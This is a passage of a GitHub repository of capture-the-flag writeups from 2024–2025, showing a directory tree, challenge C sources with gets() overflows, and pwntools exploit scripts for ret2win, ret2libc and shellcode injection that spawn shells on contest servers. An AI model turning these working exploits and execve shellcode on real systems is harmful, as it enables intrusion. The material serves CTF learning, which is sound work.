├── 2024_01_20_KnightCTF ├── README.md ├── pwn │ ├── get_sword │ │ ├── get_sword │ │ └── get_sword.md │ ├── secret_scroll │ │ └── secret_scroll.md │ └── win │ │ ├── win │ │ └── win.md ├── rev │ ├── dragons_binary │ │ ├── dragons_binary.md │ │ └── task │ └── knight_armoury │ │ ├── knight_armoury │ │ └── knight_armoury.md ├── steg │ └── flag_hunt.md └── web │ └── kitty │ └── kitty.md ├── 2024_03_09_WxMCTF24 ├── README.md ├── crypto │ └── crypto_3_racing │ │ └── racing.md ├── pwn │ ├── pwn_1_moodle_madness │ │ ├── moodle │ │ └── moodle_madness.md │ ├── pwn_2_tej3m │ │ ├── assgn1_2o3BvZ6 │ │ ├── assgn1_ScZuUx0.c │ │ ├── go.py │ │ └── tej3m.md │ └── pwn_3_nah_id_win │ │ ├── go.py │ │ ├── libc.so.6 │ │ ├── nah_id_win.md │ │ ├── vuln │ │ └── vuln.c └── web │ └── web_4_walmart │ └── Walmart!.md ├── 2024_03_15_1753CTF ├── README.md └── pwn │ ├── brain_frick │ ├── brain-frick.zip │ ├── brain_frick.md │ └── go.py │ ├── brain_heck │ ├── brain-heck.zip │ ├── brain_heck.md │ └── go.py │ ├── matrix_preloaded │ ├── go.py │ ├── matrix-preloaded.zip │ ├── matrix_preloaded.md │ ├── shellcode │ └── shellcode.asm │ └── write_only │ ├── go.py │ ├── write-only.zip │ └── write_only.md ├── 2024_04_07_TamuCTF24 ├── README.md ├── cry │ └── criminal │ │ ├── criminal.md │ │ └── criminal.zip ├── pwn │ ├── admin_panel │ │ ├── admin-panel.zip │ │ └── admin_panel.md │ └── super_lucky │ │ ├── super-lucky.zip │ │ └── super_lucky.md └── rev │ ├── pwndbg.png │ ├── resistant.md │ └── resistant.zip ├── 2024_05_17_BYUCTF24 ├── README.md ├── cry │ ├── are_s_a │ │ ├── cne.txt │ │ └── writeup.md │ └── times │ │ ├── mul_safe.py │ │ ├── times.txt │ │ └── writeup.md ├── fore │ └── Stardust_Whispers │ │ ├── Stardust Whispers.md │ │ ├── Stardust_Whispers.docx │ │ └── fun.pcapng ├── pwn │ ├── all │ │ ├── all.zip │ │ ├── go.py │ │ └── writeup.md │ ├── numbersss │ │ ├── Dockerfile │ │ ├── go.py │ │ ├── numbersss │ │ └── writeup.md │ └── static │ │ ├── go.py │ │ ├── static │ │ └── writeup.md └── web │ ├── argument │ └── writeup.md │ ├── not-a-problem │ ├── Writeup.md │ └── not-a-problem.zip │ ├── porg_city │ └── writeup.md │ ├── random │ └── writeup.md │ └── triple-whammy │ ├── Writeup.md │ └── triple-whammy.zip ├── 2024_06_08_Akasec24 ├── README.md └── pwn │ ├── bad_trip │ ├── bad_trip.zip │ ├── go.py │ └── writeup.md │ ├── good_trip │ ├── go.py │ ├── good_trip.zip │ └── writeup.md │ └── warmup │ ├── go.py │ ├── warmup.zip │ └── writeup.md ├── 2024_06_15_jCTF_Teaser24 ├── README.md └── pwn │ ├── go.py │ └── writeup.md ├── 2024_06_21_WaniCTF24 ├── README.md ├── crypto │ ├── beginners_aes │ │ ├── cry-beginners-aes.zip │ │ ├── go.py │ │ └── writeup.md │ ├── beginners_rsa │ │ ├── cry-beginners-rsa.zip │ │ ├── go.py │ │ └── writeup.md │ ├── dance │ │ ├── cry-dance.zip │ │ ├── go.py │ │ └── writeup.md │ └── replacement │ │ ├── cry-replacement.zip │ │ ├── go.py │ │ └── writeup.md ├── misc │ └── sh │ │ ├── mis-sh.zip │ │ └── writeup.md ├── pwn │ ├── do_not_rewrite │ │ ├── go.py │ │ ├── pwn-do-not-rewrite.zip │ │ └── writeup.md │ └── do_not_rewrite2 │ │ ├── go.py │ │ ├── pwn-do-not-rewrite2.zip │ │ └── writeup.md ├── rev │ ├── home │ │ ├── go.py │ │ ├── rev-home.zip │ │ └── writeup.md │ └── thread │ │ ├── go.py │ │ ├── rev-thread.zip │ │ └── writeup.md └── web │ ├── elec │ └── writeup.md │ ├── noscript │ └── writeup.md │ └── one-day-one-letter │ └── writeup.md ├── 2024_06_29_UIUCTFCTF24 ├── README.md ├── crypto │ ├── without_a_trace │ │ ├── go.py │ │ ├── server.py │ │ └── writeup.md │ └── x_marked_the_spot │ │ ├── ct │ │ ├── go.py │ │ ├── public.py │ │ └── writeup.md ├── misc │ ├── push_and_pickle │ │ ├── chal.py │ │ ├── chal_part2.py │ │ └── writeup.md │ └── slot-machine │ │ ├── chal.py │ │ └── writeup.md ├── pwn │ └── syscalls │ │ ├── Dockerfile │ │ ├── Dockerfile.local │ │ ├── go.py │ │ ├── syscalls │ │ └── writeup.md └── web │ └── fare-evasion │ └── writeup.md ├── 2024_07_06_DUCTF24 ├── README.md ├── pwn │ ├── vector_overflow │ │ ├── go.py │ │ ├── vector_overflow │ │ ├── vector_overflow.cpp │ │ └── writeup.md │ └── yawa │ │ ├── go.py │ │ ├── ld-linux-x86-64.so.2 │ │ ├── libc.so.6 │ │ ├── writeup.md │ │ ├── yawa │ │ └── yawa.c └── rev │ └── number_mashing │ ├── go.py │ ├── number-mashing │ └── writeup.md ├── 2024_07_13_OSCTF24 ├── README.md └── pwn │ ├── buffer_buffet │ ├── go.py │ ├── vuln │ └── writeup.md │ ├── byte_breakup │ ├── go.py │ ├── vuln │ └── writeup.md │ ├── coal_mine_canary │ ├── challenge │ ├── go.py │ └── writeup.md │ ├── leaky_pipes │ ├── go.py │ ├── leaky_pipes │ └── writeup.md │ ├── lib_riddle │ ├── challenge │ ├── go.py │ └── writeup.md │ ├── seed_spring │ ├── go.py │ ├── seed_spring │ └── writeup.md │ └── shell_mischief │ ├── go.py │ ├── vuln │ └── writeup.md ├── 2024_07_19_Imaginary24 ├── README.md ├── crypto │ ├── base64 │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md │ └── tango │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md ├── misc │ ├── gdbjail1 │ │ └── writeup.md │ ├── gdbjail2 │ │ └── writeup.md │ ├── ok-nice │ │ ├── jail.py │ │ └── writeup.md │ └── starship │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md ├── pwn │ └── imgstore │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md └── web │ └── journal │ └── writeup.md ├── 2024_07_26_DeadSecCTF24 ├── README.md ├── crypto │ └── flag_killer │ │ ├── go.py │ │ ├── public.zip │ │ └── writeup.md └── pwn │ └── super_cpp_calculator │ ├── go.py │ ├── public.zip │ └── writeup.md ├── 2024_08_03_TFCCTF24 ├── README.md ├── crypto │ ├── biased_elections │ │ ├── biased_elections.zip │ │ ├── go-sage.py │ │ ├── go.py │ │ └── writeup.md │ ├── ccccc │ │ ├── ccccc.txt │ │ ├── go.py │ │ └── writeup.md │ ├── conway │ │ ├── conway.zip │ │ ├── go.py │ │ └── writeup.md │ └── genetics │ │ ├── go.py │ │ ├── task.txt │ │ └── writeup.md ├── pwn │ └── guard_the_bypass │ │ ├── chall.zip │ │ ├── go.py │ │ └── writeup.md ├── rev │ ├── functional │ │ ├── functional.zip │ │ ├── go.py │ │ └── writeup.md │ └── signal │ │ ├── go.c │ │ ├── inscount.py │ │ ├── signal │ │ ├── worker.c │ │ └── writeup.md └── web │ ├── flask-destroyer │ └── writeup.md │ ├── funny │ └── writeup.md │ └── surfing │ └── writeup.md ├── 2024_08_10_LITCTF24 ├── README.md └── crypto │ ├── chal.py │ ├── go.py │ └── writeup.md ├── 2024_08_17_idekCTF24 └── README.md ├── 2024_09_06_CSAWQuals24 ├── README.md └── crypto │ ├── cbc │ ├── app.py │ ├── go.py │ ├── out.txt │ └── writeup.md │ └── trapdoor │ ├── go.py │ ├── msg1.enc │ ├── msg2.enc │ ├── public_key1 │ ├── public_key2 │ └── writeup.md ├── 2024_09_20_PatriotCTF ├── README.md └── crypto │ ├── bigger_is_better │ ├── dist.txt │ ├── go.py │ ├── go.sage │ └── writeup.md │ ├── bit_by_bit │ ├── go.py │ ├── out.txt │ ├── transmit.py │ └── writeup.md │ ├── hard_to_implement │ ├── cryptor.py │ ├── go.py │ └── writeup.md │ ├── high_roller │ ├── flag.enc │ ├── gen_setup.7z │ ├── go.py │ └── writeup.md │ └── idk_cipher │ ├── encode.py │ ├── go.py │ └── writeup.md ├── 2024_09_28_BuckeyeCTF24 ├── README.md ├── crypto │ ├── hashbrown │ │ ├── go.py │ │ ├── hashbrown.py │ │ └── writeup.md │ ├── rsa │ │ ├── go.py │ │ ├── rsa.py │ │ └── writeup.md │ └── xnor │ │ ├── go.py │ │ ├── writeup.md │ │ ├── xnor.py │ │ └── xnor_output.txt └── pwn │ ├── calculator │ ├── calc │ ├── go.py │ └── writeup.md │ ├── color │ ├── color.zip │ ├── go.py │ └── writeup.md │ ├── no_handouts │ ├── go.py │ ├── no_handouts.zip │ └── writeup.md │ ├── runway0 │ ├── go.py │ ├── runway0.zip │ └── writeup.md │ ├── runway1 │ ├── go.py │ ├── runway1.zip │ └── writeup.md │ ├── runway2 │ ├── go.py │ ├── runway2.zip │ └── writeup.md │ └── runway3 │ ├── go.py │ ├── runway3.zip │ └── writeup.md ├── 2024_10_12_BlueWaterCTF24 ├── README.md ├── crypto │ └── MD5.01 │ │ ├── go.py │ │ ├── main.py │ │ └── writeup.md ├── rev │ └── maybe_Checker │ │ ├── go.py │ │ ├── maybe_checker │ │ └── writeup.md └── web │ └── sandevistan │ └── writeup.md ├── 2024_10_19_SunshineCTF24 ├── README.md ├── crypto │ └── adventure_cipher │ │ ├── go.py │ │ ├── letter.txt │ │ └── writeup.md └── pwn │ ├── adventure_on_the_high_c │ ├── Dockerfile │ ├── go.py │ ├── ship.bin │ └── writeup.md │ └── flag_shop │ ├── flagshop │ ├── go.py │ └── writeup.md ├── 2024_10_25_HeroCTF24 ├── README.md ├── crypto │ ├── halloween │ │ ├── go.py │ │ ├── halloween.zip │ │ └── writeup.md │ ├── interpolation │ │ ├── go.py │ │ ├── go.sage │ │ ├── interpolation.zip │ │ ├── points.txt │ │ └── writeup.md │ └── paranoia │ │ ├── go.py │ │ ├── paranoia.zip │ │ └── writeup.md └── pwn │ ├── bankrupst │ ├── bankrupst │ ├── bankrupst.rs │ ├── go.py │ └── writeup.md │ └── heappie │ ├── go.py │ ├── heappie.zip │ └── writeup.md ├── 2024_11_01_HackTheVote24 ├── README.md └── pwn │ └── comma_club │ ├── comma-club.tar.gz │ ├── go.py │ └── writeup.md ├── 2024_11_10_BlueHens24 ├── README.md ├── crypto │ ├── hmac │ │ ├── dist.py │ │ ├── go.py │ │ └── writeup.md │ ├── intro_to_rsa │ │ ├── go.py │ │ └── writeup.md │ └── simon_says │ │ ├── go.py │ │ ├── simon_ctf.py │ │ └── writeup.md ├── pwn │ ├── intro_to_pwn │ │ ├── go.py │ │ ├── pwnme │ │ └── writeup.md │ ├── pure_write_what_where │ │ ├── go.py │ │ ├── pwnme │ │ └── writeup.md │ └── ret2bf │ │ ├── go.py │ │ ├── ret2bf.zip │ │ └── writeup.md ├── web │ ├── firefun_3 │ │ └── Writeup.md │ └── just-a-day-at-the-breach │ │ ├── go.py │ │ └── writeup.md └── xor │ ├── cbc_encrypted │ ├── cbcfun_lambda.py │ ├── go.py │ └── writeup.md │ ├── ctr_mode_is_just_xor │ ├── go.py │ ├── lambda.py │ └── writeup.md │ ├── roman_xor │ ├── go.py │ ├── romanXor.py │ └── writeup.md │ └── xor_without_xor │ ├── go.py │ └── writeup.md ├── 2024_11_15_1337UP24 ├── README.md ├── crypto │ ├── krsa │ │ ├── go.py │ │ ├── kRSA.py │ │ └── writeup.md │ └── schrodingers_pad │ │ ├── go.py │ │ ├── schrodingers_pad.zip │ │ └── writeup.md ├── pwn │ ├── floormat_mega_sale │ │ ├── floormat_sale.zip │ │ ├── go.py │ │ └── writeup.md │ ├── retro2win │ │ ├── go.py │ │ ├── retro2win.zip │ │ └── writeup.md │ ├── rigged_slot_machine_2 │ │ ├── go.py │ │ ├── rigged_slot2.zip │ │ └── writeup.md │ └── uap │ │ ├── go.py │ │ ├── uap.zip │ │ └── writeup.md └── rev │ └── secure_bank │ ├── go.py │ ├── secure_bank │ └── writeup.md ├── 2024_11_22_GlacierCTF24 ├── README.md ├── blockchain │ └── ArcticVault │ │ └── writeup.md └── crypto │ └── rivest_shamir_adleman_germain │ ├── go.py │ ├── rsag.tar.gz │ └── writeup.md ├── 2024_11_30_WWCTF24 ├── README.md ├── crypto │ └── simpler_rsa │ │ ├── chal.py │ │ ├── go.sage │ │ ├── out.txt │ │ └── writeup.md └── pwn │ ├── go.py │ ├── white_rabbit │ └── writeup.md ├── 2024_12_13_NiteCTF24 ├── README.md └── pwn │ ├── mixed_signal │ ├── go.py │ ├── handout.zip │ └── writeup.md │ └── print_the_gifts │ ├── go.py │ ├── handout.zip │ └── writeup.md ├── 2025_01_11_UofTCTF25 ├── README.md ├── forensics │ └── poof │ │ └── writeup.md └── pwn │ ├── baby_pwn │ ├── baby-pwn.zip │ ├── go.py │ └── writeup.md │ └── baby_pwn_2 │ ├── baby-pwn-2.zip │ ├── go.py │ └── writeup.md ├── 2025_01_18_SrdnlenCTF25 └── README.md ├── 2025_01_24_x3CTF25 ├── README.md ├── crypto │ └── curved-mvm │ │ ├── curved-mvm.tar.gz │ │ ├── go.py │ │ └── writeup.md ├── pwn │ ├── devnull-as-a-service │ │ ├── devnull-as-a-service.tar.gz │ │ ├── go.py │ │ └── writeup.md │ └── secure-sandbox │ │ ├── go.py │ │ └── secure-sandbox.tar.gz └── web │ ├── kittyconvert │ └── writeup.md │ └── submission │ └── writeup.md ├── 2025_02_01_BearcatCTF25 ├── README.md ├── crypto │ └── sqRSA │ │ ├── go.py │ │ ├── output.txt │ │ ├── sqRSA.py │ │ └── writeup.md └── pwn │ └── calling_convention │ ├── calling_convention.zip │ ├── go.py │ └── writeup.md ├── 2025_02_07_BITSCTF25 ├── README.md ├── crypto │ ├── alice_n_bob_in_wonderland │ │ ├── chall.py │ │ ├── go.py │ │ └── writeup.md │ └── baby_crypto │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── baby_pwn │ ├── go.py │ ├── main │ └── writeup.md │ └── biscuits │ ├── go.py │ ├── main │ └── writeup.md ├── 2025_02_15_BroncoCTF25 └── README.md ├── 2025_02_15_EHAXCTF25 ├── README.md └── pwn │ ├── cash_memo │ ├── chall.zip │ ├── go.py │ └── writeup.md │ └── fantastic_doom │ ├── chall.zip │ ├── go.py │ └── writeup.md ├── 2025_02_28_ApoorvCTF25 ├── README.md └── pwn │ ├── the_first_visit │ ├── files.zip │ ├── go.py │ └── writeup.md │ └── the_secret_blend │ ├── files.zip │ ├── go.py │ └── writeup.md ├── 2025_02_28_PwnMeCTFQuals25 ├── README.md ├── crypto │ └── easy_diffy │ │ ├── easy_diffy.zip │ │ ├── go.py │ │ └── writeup.md └── pwn │ └── got │ ├── go.py │ ├── got.zip │ └── writeup.md ├── 2025_03_07_KalmarCTF25 ├── Ez ⛳ v3 │ └── writeup.md ├── README.md └── dnxss │ └── writeup.md ├── 2025_03_07_PearlCTF25 ├── README.md ├── crypto │ ├── o1_punch_log │ │ ├── go.py │ │ ├── o_1__punch_log.zip │ │ └── writeup.md │ └── stegano_ellipto_graphy │ │ ├── go.py │ │ ├── hacked.zip │ │ └── writeup.md └── pwn │ ├── mr_ropot │ ├── go.py │ ├── mrropot.zip │ └── writeup.md │ ├── readme_please │ ├── go.py │ ├── readme_src.zip │ └── writeup.md │ └── treasure_hunt │ ├── go.py │ ├── treasurehunt.zip │ └── writeup.md ├── 2025_03_14_UTCTF25 ├── README.md ├── crypto │ ├── DCΔ │ │ ├── go.py │ │ ├── rsa.txt │ │ └── writeup.md │ ├── RSA │ │ ├── go.py │ │ ├── rsa.txt │ │ └── writeup.md │ └── espathra-csatu-banette │ │ ├── go.py │ │ ├── main.py │ │ └── writeup.md └── pwn │ ├── RETirement_plan │ ├── go.py │ ├── libc.so.6 │ ├── shellcode │ └── writeup.md │ └── secbof │ ├── Dockerfile │ ├── chal │ ├── go.py │ ├── start.sh │ └── writeup.md ├── 2025_03_15_Nowruz1404 ├── README.md ├── crypto │ ├── ez_rsa │ │ ├── EZ_RSA.py │ │ ├── go.py │ │ └── writeup.md │ └── ez_xor │ │ ├── EZ_XOR.py │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── seen_guessing │ ├── chall │ ├── go.py │ └── writeup.md │ └── seen_shop │ ├── go.py │ ├── seen-shop.c │ └── writeup.md ├── 2025_03_21_CyberApocalypse25 ├── README.md ├── crypto │ ├── hourcle │ │ ├── crypto_hourcle.zip │ │ ├── go.py │ │ └── writeup.md │ └── traces │ │ ├── crypto_traces.zip │ │ ├── go.py │ │ └── writeup.md └── pwn │ └── quack_quack │ ├── go.py │ ├── pwn_quack_quack.zip │ └── writeup.md ├── 2025_03_21_WolvCTF25 ├── README.md ├── crypto │ └── ecb++ │ │ ├── dist.tar.gz │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── drywall │ ├── dist.tar.gz │ ├── go.py │ └── writeup.md │ └── takenote │ ├── dist.tar.gz │ ├── go.py │ └── writeup.md ├── 2025_03_28_SwampCTF25 ├── README.md ├── crypto │ └── rock_my_password │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── beginner_pwn_1 │ ├── go.py │ ├── is_admin │ ├── main.c │ └── writeup.md │ ├── beginner_pwn_2 │ ├── binary │ ├── go.py │ └── writeup.md │ └── oh_my_buffer │ ├── binary │ ├── go.py │ └── writeup.md ├── 2025_03_28_TAMUCTF25 ├── README.md ├── crypto │ └── ECC │ │ ├── ecc.tar.gz │ │ ├── go.py │ │ └── writeup.md └── pwn │ └── debug-1 │ ├── debug-1.tar.gz │ ├── go.py │ └── writeup.md ├── 2025_04_04_Squ1rrelCTF25 ├── README.md ├── crypto │ ├── easy_rsa │ │ ├── easy_rsa.txt │ │ ├── go.py │ │ ├── rsa_easy.py │ │ └── writeup.md │ └── xor_101 │ │ └── writeup.md └── pwn │ ├── deja_vu │ ├── Dockerfile │ ├── deja-vu │ ├── go.py │ └── writeup.md │ └── jail │ ├── Dockerfile │ ├── go.py │ ├── prison │ └── writeup.md ├── 2025_04_11_1753CTF25 ├── README.md └── pwn │ └── leakcan │ ├── go.py │ ├── leakcan_chall │ └── writeup.md ├── 2025_04_12_THCon2K25CTF ├── README.md └── pwn │ └── gopwn │ ├── go.py │ ├── gopwn.zip │ └── writeup.md ├── 2025_04_18_DawgCTF25 ├── README.md ├── crypto │ ├── baby_rsa_1 │ │ ├── go.py │ │ ├── output.txt │ │ ├── source.py │ │ └── writeup.md │ └── baby_rsa_2 │ │ ├── chall.py │ │ ├── go.py │ │ ├── output.txt │ │ └── writeup.md └── pwn │ ├── 64_bits_in_my_ark_and_texture │ ├── chall │ ├── go.py │ └── writeup.md │ ├── clobber │ ├── clobber │ ├── go.py │ ├── ld.so │ └── libc.so.6 │ ├── interns_project │ ├── go.py │ ├── interns'Project │ └── writeup.md │ └── just_parry_lol │ ├── frame_trap │ ├── go.py │ └── writeup.md ├── 2025_04_25_UMDCTF25 ├── README.md └── pwn │ └── gambling2 │ ├── Dockerfile │ ├── Makefile │ ├── gambling │ ├── gambling.c │ ├── go.py │ └── writeup.md ├── 2025_05_10_DamCTF25 ├── README.md └── pwn │ └── dnd │ ├── dnd.zip │ ├── go.py │ └── writeup.md ├── 2025_05_23_NahamConCTF25 └── README.md ├── 2025_05_24_DaVinciCTF25 └── README.md └── README.md /2024_01_20_KnightCTF/README.md: -------------------------------------------------------------------------------- 1 | # KnightCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2209 4 | 5 | 115th place 980 points 6 | -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/pwn/get_sword/get_sword: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/pwn/get_sword/get_sword -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/pwn/win/win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/pwn/win/win -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/pwn/win/win.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2209/ 2 | 3 | # win... win... window...! 4 | 5 | You are a skilled hacker known for your expertise in binary exploitation. One day, you receive an anonymous message challenging your abilities. The message contains a mysterious binary file. Now you decide to analyze the file. 6 | 7 | Connection Information 8 | 9 | `nc 173.255.201.51 3337` 10 | 11 | ## Solution 12 | 13 | In `main/0x40118a` there is call to `gets` with a buffer on the stack. 0x12 bytes to return address with no stack canary. There is a function called `shell/0x401156` with no pie we can simply return to `shell` by overflowing the buffer on the stack in `main` with `gets`: 14 | 15 | ``` 16 | from pwn import * 17 | 18 | SHELL = 0x00401157 19 | 20 | #p = process("./win") 21 | p = remote("173.255.201.51", 3337) 22 | 23 | p.readline() 24 | 25 | payload = b"A" * 0x12 26 | payload += p64(SHELL) 27 | 28 | p.sendline(payload) 29 | 30 | p.sendline(b"/bin/cat flag.txt") 31 | 32 | p.interactive() 33 | ``` 34 | 35 | ``` 36 | $ python3 ./go.py 37 | [+] Opening connection to 173.255.201.51 on port 3337: Done 38 | [*] Switching to interactive mode 39 | KCTF{r3T_7o_W1n_iS_V3rRY_3AsY}$ 40 | [*] Closed connection to 173.255.201.51 port 3337 41 | ``` 42 | 43 | ## Flag 44 | `KCTF{r3T_7o_W1n_iS_V3rRY_3AsY}` 45 | -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/rev/dragons_binary/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/rev/dragons_binary/task -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/rev/knight_armoury/knight_armoury: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/rev/knight_armoury/knight_armoury -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/README.md: -------------------------------------------------------------------------------- 1 | # WxMCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2179 4 | 5 | 14th place 4521 points 6 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_1_moodle_madness/moodle: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_1_moodle_madness/moodle -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_1_moodle_madness/moodle_madness.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2179/ 2 | 3 | # WxMCTF '24 Pwn 1 - Moodle Madness - PWN 4 | 5 | It recently came to light from an anonymous source that "Moodle," the math assignment program made famous by Ms. Gugoiu, has an exploit to see the answers to questions. Buddhathe18th, always reluctant to do homework, decided to investigate this exploit himself for the notorious 3.2 STACK Part 2 Challenge. He vaguely recalls that it involves inputting a string into the answer box, but with 1 hour left, he needs some help. Could you help him find the exploit? 6 | 7 | ## Solution 8 | 9 | ``` 10 | $ file ./moodle 11 | ./moodle: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=29daf9cad61702f11a472b1cd65d493b239e3d83, for GNU/Linux 3.2.0, not stripped 12 | ``` 13 | 14 | `d2f6c75e13375d754e8ee747958664cfe4725252c526a9cc048bd54666722075 ./moodle` 15 | 16 | ``` 17 | $ strings ./moodle 18 | cmxw H 19 | m{ft H 20 | ld00 H 21 | 4m_3 H 22 | r3t5 H 23 | dn1m H 24 | }!!! H 25 | ``` 26 | 27 | ## Flag 28 | `wxmctf{m00dl3_m45t3rm1nd!!!}` 29 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/assgn1_2o3BvZ6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/assgn1_2o3BvZ6 -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/assgn1_ScZuUx0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void win(){ 6 | system("cat flag.txt"); 7 | } 8 | 9 | void func(){ 10 | char buf[040]; 11 | while(1) { 12 | puts("Enter your info: \n"); 13 | gets(buf); 14 | if(strlen(buf) < 31) { 15 | puts("Thank you for valid data!!!\n"); 16 | break; 17 | } 18 | puts("My teacher says that's unsafe!\n"); 19 | } 20 | } 21 | 22 | void main() { 23 | setvbuf(stdin, NULL, 2, 0); 24 | setvbuf(stdout, NULL, 2, 0); 25 | func(); 26 | } 27 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "8c7e7da.678470.xyz" 4 | REMOTE_PORT = 30310 5 | 6 | elf = ELF("./assgn1_2o3BvZ6") 7 | 8 | p = remote(REMOTE_IP, REMOTE_PORT) 9 | 10 | p.readuntil(b"Enter your info: \n\n") 11 | 12 | payload = b"0" * 0x2c 13 | payload += p32(elf.sym["win"]) 14 | 15 | p.sendline(payload) 16 | 17 | p.sendline() 18 | 19 | p.interactive() 20 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "1cfac3a.678470.xyz" 4 | REMOTE_PORT = 32572 5 | 6 | libc = ELF("./libc.so.6") 7 | 8 | p = remote(REMOTE_IP, REMOTE_PORT) 9 | 10 | p.readuntil(b"libc... ") 11 | 12 | leak = int(p.readline().decode(), 16) 13 | libc.address = leak - libc.sym["printf"] 14 | 15 | log.success(f"libc: {hex(libc.address)}") 16 | 17 | payload = b"A" * 0x2c 18 | payload += p32(0x0804900e) # ret < 0x90000000 19 | payload += p32(libc.sym["system"]) 20 | payload += p32(0) 21 | payload += p32(next(libc.search(b"/bin/sh"))) 22 | 23 | p.sendline(payload) 24 | 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/libc.so.6 -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/vuln -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/vuln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int vuln() { 5 | char buf[0x20]; 6 | printf("My cursed technique is revealing libc... %p\n",printf); 7 | gets(buf); 8 | if(__builtin_return_address(0) < 0x90000000) { 9 | return 0; 10 | } 11 | printf("NAH I'D WIN!\n"); 12 | exit(0); 13 | } 14 | int main() { 15 | setvbuf(stdin, NULL, 2, 0); 16 | setvbuf(stdout, NULL, 2, 0); 17 | vuln(); 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/README.md: -------------------------------------------------------------------------------- 1 | # 1753CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2234 4 | 5 | 17th place 2810 points 6 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/brain_frick/brain-frick.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/brain_frick/brain-frick.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/brain_frick/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "140.238.91.110" 4 | REMOTE_PORT = 36369 5 | 6 | p = remote(REMOTE_IP, REMOTE_PORT) 7 | 8 | p.readuntil(b"Enter your code:\n") 9 | 10 | compiled_end = b"\x48\xC7\xC0\x3C\x00\x00\x00\x0F\x05" 11 | 12 | shellcode = b"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" 13 | 14 | payload = b"" 15 | for i in range(len(compiled_end)): 16 | payload += b"<" 17 | 18 | for i in range(len(compiled_end)): 19 | payload += b"+" * (int(shellcode[i]) - int(compiled_end[i]) & 0xff) 20 | payload += b">" 21 | 22 | for b in shellcode[len(compiled_end):]: 23 | payload += b"+" * int(b) 24 | payload += b">" 25 | 26 | p.sendline(payload) 27 | 28 | p.clean() 29 | 30 | p.sendline(b"/bin/cat /flag") 31 | 32 | p.interactive() 33 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/brain_heck/brain-heck.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/brain_heck/brain-heck.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/go.py: 